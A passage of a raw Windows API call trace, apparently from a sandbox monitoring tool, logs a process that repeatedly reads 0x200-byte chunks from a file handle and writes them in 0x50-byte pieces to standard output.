[0115.084] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.084] GetFileType (hFile=0x4c) returned 0x1 [0115.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.084] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.084] GetFileType (hFile=0x4c) returned 0x1 [0115.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.084] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.084] GetFileType (hFile=0x4c) returned 0x1 [0115.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.084] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.084] GetFileType (hFile=0x4c) returned 0x1 [0115.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.084] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.084] GetFileType (hFile=0x4c) returned 0x1 [0115.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.084] WriteFile (in: hFile=0x4c, 
lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.084] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.084] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.084] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.085] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.085] GetFileType (hFile=0x4c) returned 0x1 [0115.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.085] GetFileType (hFile=0x4c) returned 0x1 [0115.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.085] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.085] GetFileType (hFile=0x4c) returned 0x1 [0115.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.085] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.085] GetFileType (hFile=0x4c) returned 0x1 [0115.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.085] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.085] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0115.085] GetFileType (hFile=0x4c) returned 0x1 [0115.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.085] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.085] GetFileType (hFile=0x4c) returned 0x1 [0115.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.085] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.085] GetFileType (hFile=0x4c) returned 0x1 [0115.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.085] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.085] GetFileType (hFile=0x4c) returned 0x1 [0115.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.086] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.086] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.086] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.086] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.086] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, 
lpOverlapped=0x0) returned 1 [0115.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.086] GetFileType (hFile=0x4c) returned 0x1 [0115.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.086] GetFileType (hFile=0x4c) returned 0x1 [0115.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.086] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.086] GetFileType (hFile=0x4c) returned 0x1 [0115.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.086] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.086] GetFileType (hFile=0x4c) returned 0x1 [0115.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.086] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.086] GetFileType (hFile=0x4c) returned 0x1 [0115.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.086] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.086] GetFileType (hFile=0x4c) returned 0x1 [0115.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.086] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 
| out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.086] GetFileType (hFile=0x4c) returned 0x1 [0115.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.086] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.086] GetFileType (hFile=0x4c) returned 0x1 [0115.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.087] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.087] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.087] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.087] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.087] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.087] GetFileType (hFile=0x4c) returned 0x1 [0115.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.087] GetFileType (hFile=0x4c) returned 0x1 [0115.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.087] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.087] GetFileType (hFile=0x4c) returned 0x1 [0115.087] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0115.087] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.087] GetFileType (hFile=0x4c) returned 0x1 [0115.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.087] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.087] GetFileType (hFile=0x4c) returned 0x1 [0115.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.087] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.087] GetFileType (hFile=0x4c) returned 0x1 [0115.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.087] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.088] GetFileType (hFile=0x4c) returned 0x1 [0115.088] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.088] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.088] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.088] GetFileType (hFile=0x4c) returned 0x1 [0115.088] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0115.088] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.088] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.088] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.088] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.088] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.088] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.088] GetFileType (hFile=0x4c) returned 0x1 [0115.088] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.088] GetFileType (hFile=0x4c) returned 0x1 [0115.088] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.088] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.088] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.088] GetFileType (hFile=0x4c) returned 0x1 [0115.088] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.088] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.088] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.088] GetFileType (hFile=0x4c) returned 0x1 [0115.088] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.088] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 
[0115.089] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.089] GetFileType (hFile=0x4c) returned 0x1 [0115.089] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.089] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.089] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.089] GetFileType (hFile=0x4c) returned 0x1 [0115.089] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.089] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.089] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.089] GetFileType (hFile=0x4c) returned 0x1 [0115.089] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.089] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.089] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.089] GetFileType (hFile=0x4c) returned 0x1 [0115.089] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.089] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.089] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.089] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.089] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.089] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, 
lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.089] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.089] GetFileType (hFile=0x4c) returned 0x1 [0115.089] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.089] GetFileType (hFile=0x4c) returned 0x1 [0115.089] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.089] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.090] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.090] GetFileType (hFile=0x4c) returned 0x1 [0115.090] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.090] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.090] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.090] GetFileType (hFile=0x4c) returned 0x1 [0115.090] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.090] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.090] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.090] GetFileType (hFile=0x4c) returned 0x1 [0115.090] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.090] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.090] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.090] GetFileType (hFile=0x4c) returned 0x1 [0115.090] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.090] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.090] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.090] GetFileType (hFile=0x4c) returned 0x1 [0115.090] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.091] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.091] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.091] GetFileType (hFile=0x4c) returned 0x1 [0115.091] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.091] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.091] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.091] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.091] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.091] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.091] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.091] GetFileType (hFile=0x4c) returned 0x1 [0115.091] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.091] GetFileType (hFile=0x4c) returned 0x1 [0115.091] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.091] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.091] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.091] GetFileType 
(hFile=0x4c) returned 0x1 [0115.091] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.091] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.091] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.091] GetFileType (hFile=0x4c) returned 0x1 [0115.091] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.091] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.091] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.091] GetFileType (hFile=0x4c) returned 0x1 [0115.091] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.091] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.091] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.092] GetFileType (hFile=0x4c) returned 0x1 [0115.092] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.092] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.092] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.092] GetFileType (hFile=0x4c) returned 0x1 [0115.092] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.092] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.092] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.092] GetFileType (hFile=0x4c) returned 0x1 [0115.092] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0115.092] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.092] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.092] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.092] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.092] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.092] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.092] GetFileType (hFile=0x4c) returned 0x1 [0115.092] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.092] GetFileType (hFile=0x4c) returned 0x1 [0115.092] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.092] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.092] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.092] GetFileType (hFile=0x4c) returned 0x1 [0115.092] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.092] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.092] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.092] GetFileType (hFile=0x4c) returned 0x1 [0115.092] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.092] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, 
